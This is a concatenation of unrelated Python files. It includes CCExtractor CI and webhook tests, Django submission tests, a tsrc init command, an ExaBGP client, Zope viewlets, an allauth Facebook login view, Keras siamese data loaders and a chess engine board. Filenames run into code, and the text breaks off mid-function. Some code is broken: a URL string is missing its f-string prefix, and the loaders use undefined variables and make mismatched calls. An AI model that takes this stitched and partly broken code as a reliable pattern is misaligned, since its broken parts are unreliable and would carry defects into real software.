test_customize_tests_run_on_fork_if_remote_exist(self, mock_etree, mock_open, mock_rmtree, mock_libvirt, mock_repo, mock_git): self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.tester) self.create_forktest("own-fork-commit", TestPlatform.linux) import mod_ci.cron import mod_ci.controllers reload(mod_ci.cron) reload(mod_ci.controllers) from mod_ci.cron import cron conn = mock_libvirt() vm = conn.lookupByName() import libvirt # mocking the libvirt kvm to shut down vm.info.return_value = [libvirt.VIR_DOMAIN_SHUTOFF] # Setting current snapshot of libvirt vm.hasCurrentSnapshot.return_value = 1 repo = mock_repo() origin = repo.remote() from collections import namedtuple Remotes = namedtuple('Remotes', 'name') repo.remotes = [Remotes(name='fork_2')] GitPullInfo = namedtuple('GitPullInfo', 'flags') pull_info = GitPullInfo(flags=0) origin.pull.return_value = [pull_info] cron() fork_url = ('https://github.com/{user}/{repo}.git').format( user=self.user.name, repo=g.github['repository']) repo.remote.assert_called_with('fork_2') @mock.patch('github.GitHub') @mock.patch('git.Repo') @mock.patch('libvirt.open') @mock.patch('shutil.rmtree') @mock.patch('mod_ci.controllers.open') @mock.patch('lxml.etree') def 
test_customize_tests_run_on_selected_regression_tests(self, mock_etree, mock_open, mock_rmtree, mock_libvirt, mock_repo, mock_git): self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.tester) self.create_forktest("own-fork-commit", TestPlatform.linux, regression_tests=[2]) import mod_ci.cron import mod_ci.controllers reload(mod_ci.cron) reload(mod_ci.controllers) from mod_ci.cron import cron conn = mock_libvirt() vm = conn.lookupByName() import libvirt vm.info.return_value = [libvirt.VIR_DOMAIN_SHUTOFF] vm.hasCurrentSnapshot.return_value = 1 repo = mock_repo() origin = repo.remote() from collections import namedtuple Remotes = namedtuple('Remotes', 'name') repo.remotes = [Remotes(name='fork_2')] GitPullInfo = namedtuple('GitPullInfo', 'flags') pull_info = GitPullInfo(flags=0) origin.pull.return_value = [pull_info] single_test = mock_etree.Element('tests') mock_etree.Element.return_value = single_test cron() mock_etree.SubElement.assert_any_call(single_test, 'entry', id=str(2)) assert (single_test, 'entry', str(1)) not in mock_etree.call_args_list def test_customizedtest_added_to_queue(self): regression_test = RegressionTest.query.filter(RegressionTest.id == 1).first() regression_test.active = False g.db.add(regression_test) g.db.commit() import mod_ci.controllers reload(mod_ci.controllers) from mod_ci.controllers import queue_test queue_test(g.db, None, 'customizedcommitcheck', TestType.commit) test = Test.query.filter(Test.id == 3).first() customized_test = test.get_customized_regressiontests() self.assertIn(2, customized_test) self.assertNotIn(1, customized_test) @mock.patch('mailer.Mailer') def test_inform_mailing_list(self, mock_email): """ Test the inform_mailing_list function """ from mod_ci.controllers import inform_mailing_list from mailer import Mailer email = inform_mailing_list(mock_email, "matejmecka", "2430", "Some random string", "Lorem Ipsum sit dolor amet...") mock_email.send_simple_message.assert_called_once_with( { 'text': '2430 - Some random string\n\n' ' Link to Issue: https://www.github.com/test_owner/test_repo/issues/matejmecka\n\n' ' Some random string(https://github.com/Some random string)\n\n\n' ' Lorem Ipsum sit dolor amet...\n ', 'subject': 'GitHub Issue #matejmecka', 'to': '' } ) @mock.patch('requests.get', side_effect=MockRequests) def test_add_blocked_users(self, mock_request): """ Check adding a user to block list. """ self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.admin) with self.app.test_client() as c: response = c.post( '/account/login', data=self.create_login_form_data(self.user.email, self.user.password)) response = c.post( '/blocked_users', data=dict(user_id=1, comment="Bad user", add=True)) self.assertNotEqual(BlockedUsers.query.filter(BlockedUsers.user_id == 1).first(), None) with c.session_transaction() as session: flash_message = dict(session['_flashes']).get('message') self.assertEqual(flash_message, "User blocked successfully.") @mock.patch('requests.get', side_effect=MockRequests) def test_add_blocked_users_wrong_id(self, mock_request): """ Check adding invalid user id to block list. 
""" self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.admin) with self.app.test_client() as c: response = c.post( '/account/login', data=self.create_login_form_data(self.user.email, self.user.password)) response = c.post( '/blocked_users', data=dict(user_id=0, comment="Bad user", add=True)) self.assertEqual(BlockedUsers.query.filter(BlockedUsers.user_id == 0).first(), None) self.assertIn("GitHub User ID not filled in", str(response.data)) @mock.patch('requests.get', side_effect=MockRequests) def test_add_blocked_users_empty_id(self, mock_request): """ Check adding blank user id to block list. """ self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.admin) with self.app.test_client() as c: response = c.post( '/account/login', data=self.create_login_form_data(self.user.email, self.user.password)) response = c.post( '/blocked_users', data=dict(comment="Bad user", add=True)) self.assertEqual(BlockedUsers.query.filter(BlockedUsers.user_id == None).first(), None) self.assertIn("GitHub User ID not filled in", str(response.data)) @mock.patch('requests.get', side_effect=MockRequests) def test_add_blocked_users_already_exists(self, mock_request): """ Check adding existing blocked user again. """ self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.admin) with self.app.test_client() as c: response = c.post( '/account/login', data=self.create_login_form_data(self.user.email, self.user.password)) blocked_user = BlockedUsers(1, "Bad user") g.db.add(blocked_user) g.db.commit() response = c.post( '/blocked_users', data=dict(user_id=1, comment="Bad user", add=True)) with c.session_transaction() as session: flash_message = dict(session['_flashes']).get('message') self.assertEqual(flash_message, "User already blocked.") @mock.patch('requests.get', side_effect=MockRequests) def test_remove_blocked_users(self, mock_request): """ Check removing user from block list. """ self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.admin) with self.app.test_client() as c: response = c.post( '/account/login', data=self.create_login_form_data(self.user.email, self.user.password)) blocked_user = BlockedUsers(1, "Bad user") g.db.add(blocked_user) g.db.commit() self.assertNotEqual(BlockedUsers.query.filter(BlockedUsers.comment == "Bad user").first(), None) response = c.post( '/blocked_users', data=dict(user_id=1, remove=True)) self.assertEqual(BlockedUsers.query.filter(BlockedUsers.user_id == 1).first(), None) with c.session_transaction() as session: flash_message = dict(session['_flashes']).get('message') self.assertEqual(flash_message, "User removed successfully.") @mock.patch('requests.get', side_effect=MockRequests) def test_remove_blocked_users_wrong_id(self, mock_request): """ Check removing non existing id from block list. """ self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.admin) with self.app.test_client() as c: response = c.post( '/account/login', data=self.create_login_form_data(self.user.email, self.user.password)) response = c.post( '/blocked_users', data=dict(user_id=7355608, remove=True)) with c.session_transaction() as session: flash_message = dict(session['_flashes']).get('message') self.assertEqual(flash_message, "No such user in Blacklist") @mock.patch('requests.get', side_effect=MockRequests) def test_remove_blocked_users_empty_id(self, mock_request): """ Check removing blank user id from block list. 
""" self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.admin) with self.app.test_client() as c: response = c.post( '/account/login', data=self.create_login_form_data(self.user.email, self.user.password)) response = c.post( '/blocked_users', data=dict(remove=True)) self.assertIn("GitHub User ID not filled in", str(response.data)) @mock.patch('requests.get', side_effect=MockRequests) def test_webhook_wrong_url(self, mock_request): """ Check webhook fails when ping with wrong url """ import json with self.app.test_client() as c: data = {'release': {'prerelease': False, 'published_at': '2018-05-30T20:18:44Z', 'tag_name': '0.0.1'}} sig = self.generate_signature(str(json.dumps(data)).encode('utf-8'), g.github['ci_key']) headers = self.generate_git_api_header('ping', sig) # non github ip address wsgi_environment = {'REMOTE_ADDR': '0.0.0.0'} response = c.post( '/start-ci', environ_overrides=wsgi_environment, data=json.dumps(data), headers=headers) self.assertNotEqual(response.status_code, 200) @mock.patch('requests.get', side_effect=MockRequests) def test_webhook_ping(self, mock_request): """ Check webhook release update CCExtractor Version """ import json with self.app.test_client() as c: data = {'release': {'prerelease': False, 'published_at': '2018-05-30T20:18:44Z', 'tag_name': '0.0.1'}} sig = self.generate_signature(str(json.dumps(data)).encode('utf-8'), g.github['ci_key']) headers = self.generate_git_api_header('ping', sig) # one of ip address from github webhook wsgi_environment = {'REMOTE_ADDR': '192.168.3.11'} response = c.post( '/start-ci', environ_overrides=wsgi_environment, data=json.dumps(data), headers=headers) self.assertEqual(response.status_code, 200) self.assertEqual(response.data, b'{"msg": "Hi!"}') @mock.patch('requests.get', side_effect=MockRequests) def test_webhook_release(self, mock_request): """ Check webhook release update CCExtractor Version """ import json with self.app.test_client() as c: # Full Release with version with 2.1 data = {'release': {'prerelease': False, 'published_at': '2018-05-30T20:18:44Z', 'tag_name': 'v2.1'}} sig = self.generate_signature(str(json.dumps(data)).encode('utf-8'), g.github['ci_key']) headers = self.generate_git_api_header('release', sig) # one of ip address from github webhook wsgi_environment = {'REMOTE_ADDR': '192.168.3.11'} last_commit = GeneralData.query.filter(GeneralData.key == 'last_commit').first() # abcdefgh is the new commit after previous version defined in base.py last_commit.value = 'abcdefgh' g.db.commit() response = c.post( '/start-ci', environ_overrides=wsgi_environment, data=json.dumps(data), headers=headers) last_release = CCExtractorVersion.query.order_by(CCExtractorVersion.released.desc()).first() self.assertEqual(last_release.version, '2.1') @mock.patch('requests.get', side_effect=MockRequests) def test_webhook_prerelease(self, mock_request): """ Check webhook release update CCExtractor Version """ import json with self.app.test_client() as c: # Full Release with version with 2.1 data = {'release': {'prerelease': True, 'published_at': '2018-05-30T20:18:44Z', 'tag_name': 'v2.1'}} sig = self.generate_signature(str(json.dumps(data)).encode('utf-8'), g.github['ci_key']) headers = self.generate_git_api_header('release', sig) # one of ip address from github webhook wsgi_environment = {'REMOTE_ADDR': '192.168.3.11'} last_commit = GeneralData.query.filter(GeneralData.key == 'last_commit').first() # abcdefgh is the new commit after previous version defined in base.py last_commit.value = 
'abcdefgh' g.db.commit() response = c.post( '/start-ci', environ_overrides=wsgi_environment, data=json.dumps(data), headers=headers) last_release = CCExtractorVersion.query.order_by(CCExtractorVersion.released.desc()).first() self.assertNotEqual(last_release.version, '2.1') def generate_signature(self, data, private_key): """ Generate signature token of hook request :param data: Signature's data :param private_key: Signature's token """ import hashlib import hmac algorithm = hashlib.__dict__.get('sha1') encoded_key = bytes(private_key, 'latin-1') mac = hmac.new(encoded_key, msg=data, digestmod=algorithm) return mac.hexdigest() def generate_git_api_header(self, event, sig): """ Create header for Github API Request :param event: Name of the event type that triggered the delivery. :param sig: The HMAC hex digest of the response body. The HMAC hex digest is generated using the sha1 hash function and the secret as the HMAC key. """ # Header information from https://developer.github.com/webhooks/ headers = Headers([('X-GitHub-Event', event), ('X-Github-Delivery', '72d3162e-cc78-11e3-81ab-4c9367dc0958'), ('X-Hub-Signature', ('sha1={0}').format(sig)), ('User-Agent', 'GitHub-Hookshot/044aadd'), ('Content-Type', 'application/json'), ('Content-Length', 6615) ]) return headers
from django.contrib.auth.models import User from django.core.urlresolvers import reverse from django.test import TestCase, Client from reddit.forms import SubmissionForm from reddit.models import Submission from users.models import RedditUser class TestSubmissionForm(TestCase): def test_full_valid_submission(self): test_data = { 'title': 'submission_title', 'url': 'http://example.com', 'text': 'submission text' } form = SubmissionForm(data=test_data) self.assertTrue(form.is_valid()) def test_minimum_data_required(self): test_data = { 'title': 'submission title' } form = SubmissionForm(data=test_data) self.assertTrue(form.is_valid()) def test_invalid_data(self): test_data = { 'title': '.' * 300, 'url': 'notaurl', 'text': '.' 
* 5001 } form = SubmissionForm(data=test_data) self.assertEqual(form.errors['title'], ["Ensure this value has at most 250 characters (it has 300)."]) self.assertEqual(form.errors['url'], ["Enter a valid URL."]) self.assertEqual(form.errors['text'], ["Ensure this value has at most 5000 characters (it has 5001)."]) self.assertFalse(form.is_valid()) class TestSubmissionRequests(TestCase): def setUp(self): self.c = Client() self.login_data = { 'username': 'submissiontest', 'password': 'password' } RedditUser.objects.create( user=User.objects.create_user(**self.login_data) ) def test_logged_out(self): r = self.c.get(reverse('submit')) self.assertRedirects(r, "{}?next={}".format( reverse('login'), reverse('submit') )) def test_logged_in_GET(self): self.c.login(**self.login_data) r = self.c.get(reverse('submit')) self.assertIsInstance(r.context['form'], SubmissionForm) def test_making_a_submission(self): self.c.login(**self.login_data) test_data = { 'title': 'submission title', 'url': 'http://example.com', 'text': 'submission text' } r = self.c.post(reverse('submit'), data=test_data, follow=True) submission = Submission.objects.filter(**test_data).first() self.assertIsNotNone(submission) self.assertRedirects(r, reverse('thread', args=(submission.id,))) self.assertContains(r, 'Submission created') def test_missing_fields(self): self.c.login(**self.login_data) test_data = { 'url': 'http://example.com', 'text': 'submission text' } r = self.c.post(reverse('submit'), data=test_data) self.assertNotContains(r, 'Submission created') self.assertContains(r, 'This field is required.') tsrc/cli/init.py0 """ Entry point for `tsrc init` """ import argparse import os from path import Path import cli_ui as ui import tsrc from tsrc.workspace import Workspace from tsrc.workspace.config import WorkspaceConfig def main(args: argparse.Namespace) -> None: path_as_str = args.workspace_path or os.getcwd() workspace_path = Path(path_as_str) cfg_path = workspace_path / ".tsrc" / "config.yml" if cfg_path.exists(): raise tsrc.Error("Workspace already configured with file " + cfg_path) ui.info_1("Configuring workspace in", ui.bold, workspace_path) workspace_config = WorkspaceConfig( manifest_url=args.url, manifest_branch=args.branch, clone_all_repos=args.clone_all_repos, repo_groups=args.groups, shallow_clones=args.shallow, ) workspace_config.save_to_file(cfg_path) workspace = Workspace(workspace_path) workspace.update_manifest() workspace.clone_missing() workspace.set_remotes() workspace.copy_files() ui.info_2("Workspace initialized") ui.info_2("Configuration written in", ui.bold, workspace.cfg_path) backend/core/taps/exabgp_client.py from socketIO_client import SocketIO, BaseNamespace import argparse from kombu import Connection, Producer, Exchange from utils import mformat_validator, normalize_msg_path, key_generator, RABBITMQ_HOST, get_logger import signal log = get_logger() class ExaBGP(): def __init__(self, prefixes, host): self.host = host self.prefixes = prefixes self.sio = None signal.signal(signal.SIGTERM, self.exit) signal.signal(signal.SIGINT, self.exit) signal.signal(signal.SIGCHLD, signal.SIG_IGN) def start(self): with Connection(RABBITMQ_HOST) as connection: self.connection = connection self.exchange = Exchange( 'bgp-update', channel=connection, type='direct', durable=False) self.exchange.declare() try: self.sio = SocketIO('http://' + self.host, namespace=BaseNamespace) def exabgp_msg(bgp_message): msg = { 'type': bgp_message['type'], 'communities': bgp_message.get('communities', []), 'timestamp': 
float(bgp_message['timestamp']), 'path': bgp_message.get('path', []), 'service': 'exabgp|{}'.format(self.host), 'prefix': bgp_message['prefix'], 'peer_asn': int(bgp_message['peer_asn']) } if mformat_validator(msg): with Producer(connection) as producer: msgs = normalize_msg_path(msg) for msg in msgs: key_generator(msg) log.debug(msg) producer.publish( msg, exchange=self.exchange, routing_key='update', serializer='json' ) else: log.warning('Invalid format message: {}'.format(msg)) self.sio.on('exa_message', exabgp_msg) self.sio.emit('exa_subscribe', {'prefixes': self.prefixes}) self.sio.wait() except KeyboardInterrupt: self.exit() except Exception: log.exception('exception') def exit(self): print('Exiting ExaBGP') if self.sio is not None: self.sio.disconnect() self.sio.wait() if __name__ == '__main__': parser = argparse.ArgumentParser(description='ExaBGP Monitor Client') parser.add_argument('-p', '--prefix', type=str, dest='prefix', default=None, help='Prefix to be monitored') parser.add_argument('-r', '--host', type=str, dest='host', default=None, help='Prefix to be monitored') args = parser.parse_args() prefixes = args.prefix.split(',') exa = ExaBGP(prefixes, args.host) print('Starting ExaBGP on {} for {}'.format(args.host, prefixes)) try: exa.start() except BaseException: log.exception('exception') ############################################################################## # # Copyright (c) 2006-2007 Zope Foundation and Contributors. # All Rights Reserved. # # This software is subject to the provisions of the Zope Public License, # Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## """Grok components""" from operator import itemgetter from zope import component, interface from zope.viewlet.manager import ViewletManagerBase from zope.viewlet.viewlet import ViewletBase from grokcore.viewlet import interfaces, util @interface.implementer(interfaces.IViewletManager) class ViewletManager(ViewletManagerBase): template = None def __init__(self, context, request, view): super(ViewletManager, self).__init__(context, request, view) self.context = context self.request = request self.view = view self.__name__ = self.__view_name__ static_name = getattr(self, '__static_name__', None) if static_name is not None: self.static = component.queryAdapter( self.request, interface.Interface, name=static_name) else: self.static = None def sort(self, viewlets): """Sort the viewlets. ``viewlets`` is a list of tuples of the form (name, viewlet). """ # Sort viewlets following grok.order rule. return util.sort_components(viewlets, key=itemgetter(1)) def default_namespace(self): namespace = {} namespace['context'] = self.context namespace['request'] = self.request namespace['static'] = self.static namespace['view'] = self.view namespace['viewletmanager'] = self return namespace def namespace(self): return {} def update(self): super(ViewletManager, self).update() # Filter out the unavailable viewlets *after* the viewlet's update() # has been called. 
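# (Per the comments in this file, super().update() has already invoked update()
# on every viewlet by this point, so available() is consulted after update()
# and before render() -- the same contract documented on Viewlet.available below.)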
self.viewlets = [v for v in self.viewlets if v.available()] def render(self): """See zope.contentprovider.interfaces.IContentProvider""" # Now render the view if self.template: return self.template.render(self) else: return u'\n'.join([viewlet.render() for viewlet in self.viewlets]) # Mark the render() method as a method from the base class. That # way we can detect whether somebody overrides render() in a subclass. render.base_method = True class Viewlet(ViewletBase): """Batteries included viewlet. """ def __init__(self, context, request, view, manager): super(Viewlet, self).__init__(context, request, view, manager) self.context = context self.request = request self.view = view self.viewletmanager = manager self.__name__ = self.__view_name__ static_name = getattr(self, '__static_name__', None) if static_name is not None: self.static = component.queryAdapter( self.request, interface.Interface, name=static_name) else: self.static = None def default_namespace(self): namespace = {} namespace['context'] = self.context namespace['request'] = self.request namespace['static'] = self.static namespace['view'] = self.view namespace['viewlet'] = self namespace['viewletmanager'] = self.manager return namespace def namespace(self): return {} def update(self): pass def available(self): """Return True if this viewlet is to be rendered. False otherwise. Note that the available() method is called *after* update() but *before* render() has been called. """ return True def render(self): return self.template.render(self) # Mark the render() method as a method from the base class. That # way we can detect whether somebody overrides render() in a subclass. render.base_method = True import os import torch import zipfile import time as t import torchvision from tqdm import notebook import torch.nn.functional as F from IPython.display import Image, clear_output from tensorboardcolab import TensorBoardColab from torch.optim.lr_scheduler import ReduceLROnPlateau from torch.optim import SGD, Adam # Hardware Properties def hardware_specs(): return 'PyTorch %s %s' % (torch.__version__, torch.cuda.get_device_properties(0) if torch.cuda.is_available() else 'CPU') from rest_framework import serializers from db.models.classe import Classe class ClasseSerializer(serializers.ModelSerializer): class Meta: model = Classe fields = '__all__' import logging import requests from datetime import timedelta from django.utils import timezone from allauth.socialaccount import app_settings, providers from allauth.socialaccount.helpers import ( complete_social_login, render_authentication_error, ) from allauth.socialaccount.models import SocialLogin, SocialToken from allauth.socialaccount.providers.core.oauth2.views import ( ProviderView, OAuth2View, OAuth2CallbackView, OAuth2LoginView, ) from .forms import FacebookConnectForm logger = logging.getLogger(__name__) class FacebookLoginByTokenView(ProviderView): def dispatch(self, request): ret = None auth_exception = None if request.method == 'POST': form = FacebookConnectForm(request.POST) if form.is_valid(): try: provider = self.provider login_options = provider.get_fb_login_options(request) app = provider.get_app(request) access_token = form.cleaned_data['access_token'] expires_at = None if login_options.get('auth_type') == 'reauthenticate': info = requests.get(f'{provider.base_graph_url}/oauth/access_token_info', params={'client_id': app.client_id, 'access_token': access_token}).json() nonce = provider.get_nonce(request, pop=True) ok = nonce and nonce == info.get('auth_nonce') else: ok 
= True if ok and provider.get_settings().get('EXCHANGE_TOKEN'): resp = requests.get( '{provider.base_graph_url}/oauth/access_token', params={ 'grant_type': 'fb_exchange_token', 'client_id': app.client_id, 'client_secret': app.secret, 'fb_exchange_token': access_token }).json() access_token = resp['access_token'] expires_in = resp.get('expires_in') if expires_in: expires_at = timezone.now() + timedelta(seconds=int(expires_in)) if ok: token = SocialToken(app=app, token=access_token, expires_at=expires_at) login = provider.complete_login(request, app, token) login.token = token login.state = SocialLogin.state_from_request(request) ret = complete_social_login(request, login) except requests.RequestException as e: logger.exception('Error accessing FB user profile') auth_exception = e if not ret: ret = render_authentication_error(request, provider.id, exception=auth_exception) return ret from tensorflow.python.keras.utils.data_utils import Sequence from keras.preprocessing import image import numpy as np from keras.utils import np_utils from config import batch_size, image_size_h_c, image_size_w_c, nchannels, num_workers #------------------------------------------------------------------------------ def process_load(f1, vec_size): _i1 = image.load_img(f1, target_size=vec_size) _i1 = image.img_to_array(_i1, dtype='uint8') _i1 = ((_i1/255.0) - [0.485, 0.456, 0.406]) / [0.229, 0.224, 0.225] return _i1 def load_img(img, vec_size, vec_size2, metadata_dict, preprocess): iplt0 = process_load(img[0][0], vec_size) iplt1 = process_load(img[1][0], vec_size) d1 = { "i0":iplt0, "i1":iplt1, "l":img[2], "p1":img[0][0], "p2":img[1][0], "c1":img[3][0], "c2":img[4][0] } return d1 class SiameseSequence(Sequence): def __init__(self, features, augmentations=None, batch_size=batch_size, preprocess = None, input2=(image_size_h_c,image_size_w_c,nchannels), with_paths=False): self.features = features self.batch_size = batch_size self.vec_size = input2 self.preprocess = preprocess self.augment = augmentations self.with_paths = with_paths def __len__(self): return int(np.ceil(len(self.features) / float(self.batch_size))) def __getitem__(self, idx): start = idx * self.batch_size end = (idx + 1) * self.batch_size batch = self.features[start:end] futures = [] _vec_size = (len(batch),) + self.vec_size b1 = np.zeros(_vec_size) b2 = np.zeros(_vec_size) blabels = np.zeros((len(batch))) p1 = [] p2 = [] c1 = [] c2 = [] i1 = 0 for _b in batch: res = load_img(_b, self.vec_size, self.vec_size2, self.metadata_dict, self.preprocess) if self.augment is not None: b1[i1,:,:,:] = self.augment[0][0](image=res['i0'])["image"] b2[i1,:,:,:] = self.augment[1][0](image=res['i1'])["image"] else: b1[i1,:,:,:] = res['i0'] b2[i1,:,:,:] = res['i1'] blabels[i1] = res['l'] p1.append(res['p1']) p2.append(res['p2']) c1.append(res['c1']) c2.append(res['c2']) i1+=1 blabels = np_utils.to_categorical(np.array(blabels), 2) result = [[b3, b4], blabels] if self.with_paths: result += [[p1,p2]] return result def load_img_temporal(img, vec_size2, tam, metadata_dict): iplt2 = [process_load(img[1][i], vec_size2, None) for i in range(tam)] iplt3 = [process_load(img[3][i], vec_size2, None) for i in range(tam)] d1 = {"i2":iplt2, "i3":iplt3, "l":img[4], "p1":str(img[0]), "p2":str(img[2]), "c1":img[5]['color'], "c2":img[5]['color'] } d1['metadata'] = [] for i in range(tam): diff = abs(np.array(metadata_dict[img[0][i]][:7]) - np.array(metadata_dict[img[2][i]][:7])).tolist() for j in range(len(diff)): diff[j] = 1 if diff[j] else 0 d1['metadata'] += metadata_dict[img[0][i]] 
+ metadata_dict[img[2][i]] + diff d1['metadata'] = np.array(d1['metadata']) return d1 class SiameseSequenceTemporal(Sequence): def __init__(self,features, augmentations, tam, metadata_dict, metadata_length, batch_size, with_paths=False): self.tam = tam self.features = features self.batch_size = batch_size self.vec_size2 = (image_size_h_c,image_size_w_c,nchannels) self.metadata_dict = metadata_dict self.metadata_length = metadata_length self.augment = augmentations self.with_paths = with_paths def __len__(self): return int(np.ceil(len(self.features) / float(self.batch_size))) def __getitem__(self, idx): start = idx * self.batch_size end = (idx + 1) * self.batch_size batch = self.features[start:end] futures = [] _vec_size2 = (len(batch),self.tam,) + self.vec_size2 b3 = np.zeros(_vec_size2) b4 = np.zeros(_vec_size2) blabels = np.zeros((len(batch))) p1 = [] p2 = [] c1 = [] c2 = [] if self.metadata_length>0: metadata = np.zeros((len(batch),self.metadata_length)) i = 0 for _b in batch: r = load_img_temporal(_b, self.vec_size2, self.tam, self.metadata_dict) for j in range(self.tam): b3[i,j,:,:,:] = self.augment[2][j](image=r['i2'][j])["image"] b4[i,j,:,:,:] = self.augment[3][j](image=r['i3'][j])["image"] blabels[i] = r['l'] p1.append(r['p1']) p2.append(r['p2']) c1.append(r['c1']) c2.append(r['c2']) if self.metadata_length>0: metadata[i,:] = r['metadata'] i+=1 blabels2 = np.array(blabels).reshape(-1,1) blabels = np_utils.to_categorical(blabels2, 2) y = {"class_output":blabels, "reg_output":blabels2} result = [[b3, b4, metadata], y] if self.with_paths: result += [[p1,p2]] return resultGRUPO-ES2-GJLRT/XADREZ_ES2 import re from collections import namedtuple Piece = namedtuple("Piece", "name position color") ## from constants import ( # Directions E, W, EMPTY, # Board A8, H1, # Pieces PAWN, KNIGHT, BISHOP, ROOK, QUEEN, KING, PIECE_EMPTY, # Colors COLOR_EMPTY, WHITE, BLACK, # Legal LEGAL, # Movements PAWN_OFFSETS, PIECE_OFFSET, PIECE_OFFSET_SIZE, NORMAL, CAPTURE, BIG_PAWN, EN_PASSANT, KINGSIDE, QUEENSIDE, # Rank SECOND_RANK, # Value Tables PAWN_TABLE, KNIGHT_TABLE, BISHOP_TABLE, ROOK_TABLE, QUEEN_TABLE, KING_EARLYGAME_TABLE, KING_ENDGAME_TABLE, # Attacked ATTACKS, RAYS, SHIFTS, # Print PRINT_ARRAY, NAMES, # Functions is_square, is_not_square, rank, next_color ) from functions import tuple_to_0x88, p0x88_to_tuple, chess_notation_to_0x88 from zobrist import ( zobrist_pieces, zobrist_castling, zobrist_color, zobrist_en_passant ) from move import Move ## class Board(object): def __init__(self, new_game): ## self.pieces = [0] * 128 self.colors = [0] * 128 self.kings = [0] * 2 self.castling = [0] * 2 self.pieces_count = [0] * 14 self.values = [0] * 128 ## if new_game: self.load_fen( "rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1") else: self.clear() def clear(self): for i in range(128): self.pieces[i] = PIECE_EMPTY self.colors[i] = COLOR_EMPTY self.values[i] = 0 for i in range(7): self.pieces_count[WHITE * 7 + i] = 0 self.pieces_count[BLACK * 7 + i] = 0 self.kings[WHITE] = EMPTY self.kings[BLACK] = EMPTY self.current_color = WHITE self.castling[0] = 0 self.castling[1] = 0 self.en_passant_square = EMPTY self.half_moves = 0 self.moves = 1 self.hash = 0 self.pieces_list = [] self.last_hash = 0 self.black_value = 23902 self.white_value = 23902 def clone(self): result = Board(False) for i in range(128): result.pieces[i] = self.pieces[i] result.colors[i] = self.colors[i] result.values[i] = self.values[i] for i in range(7): result.pieces_count[i] = self.pieces_count[i] result.pieces_count[7 + i] = 
self.pieces_count[7 + i] result.kings[WHITE] = self.kings[WHITE] result.kings[BLACK] = self.kings[BLACK] result.current_color = self.current_color result.castling[WHITE] = self.castling[WHITE] result.castling[BLACK] = self.castling[BLACK] result.en_passant_square = self.en_passant_square result.half_moves = self.half_moves result.moves = self.moves result.hash = self.hash result.last_hash = self.last_hash result.pieces_list = self.pieces_list result.black_value = self.black_value result.white_value = self.white_value return result def add(self, piece, color, square): self.pieces[square] = piece self.colors[square] = color if piece == KING: self.kings[color] = square self.pieces_count[color * 7 + piece] += 1 self.hash ^= zobrist_pieces[piece][color][square] def remove(self, square): piece = self.pieces[square] color = self.colors[square] if piece: self.hash ^= zobrist_pieces[piece][color][square] if piece == KING: self.kings[color] = PIECE_EMPTY self.pieces[square] = PIECE_EMPTY self.colors[square] = COLOR_EMPTY self.pieces_count[color * 7 + piece] -= 1 def hindered(self, color): result = set() attack_moves = self.attack_moves(-1, color) for move in attack_moves: result.add( p0x88_to_tuple(move.destination()) ) return result def get_value(self): self.white_value = 0 self.black_value = 0 result = 0 for i in range(A8, H1 + 1): if is_not_square(i): i = i + 7 continue result += self.values[i] if self.colors[i] == WHITE: self.white_value += self.values[i] elif self.colors[i] == BLACK: self.black_value += -self.values[i] return result def possible_moves(self, color): result = self.generate_moves(LEGAL, EMPTY, color) result.sort(reverse=True, key=move_key) return result def possible_killing_moves(self, color): result = set() moves = self.generate_moves(LEGAL, EMPTY, color) for move in moves: if move.get_flags() & (CAPTURE | EN_PASSANT): result.add(move) return result def color(self): return self.current_color def current_king_position(self): return p0x88_to_tuple(self._current_king_position()) def move(self, original_position, new_position, promotion): dest = tuple_to_0x88(new_position) moves = self.generate_moves( LEGAL, tuple_to_0x88(original_position), COLOR_EMPTY, ) for move in moves: if move.destination() == dest: move.set_promotion(promotion) move.do_update(self) return move return False def piece_moves(self, position): square = tuple_to_0x88(position) color = self.colors[square] moves = self.generate_moves( LEGAL, square, color, ) return moves def piece_attack_moves(self, position): square = tuple_to_0x88(position) color = self.colors[square] moves = self.attack_moves( square, color, ) return moves def at(self, position): square = tuple_to_0x88(position) color = self.colors[square] piece = self.pieces[square] if piece == PIECE_EMPTY: return None result = "white " if color == WHITE else "black " result += NAMES[piece] return result def load_fen(self, fen): self.clear() tokens = re.compile("\s+").split(fen) position = tokens[0] y = 7 x = 0 for piece in position: if piece == '/': y -= 1 x = 0 elif piece == '1': x += 1 elif piece == '2': x += 2 elif piece == '3': x += 3 elif piece == '4': x += 4 elif piece == '5': x += 5 elif piece == '6': x += 6 elif piece == '7': x += 7 elif piece == '8': x += 8 else: square = (7 - y) * 16 + x color = WHITE lp = piece.lower() if piece == lp: color = BLACK if lp == 'p': self.add(PAWN, color, square) self.values[square] = self.piece_value(PAWN, color, square) elif lp == 'n': self.add(KNIGHT, color, square) self.values[square] = self.piece_value(KNIGHT, color, 
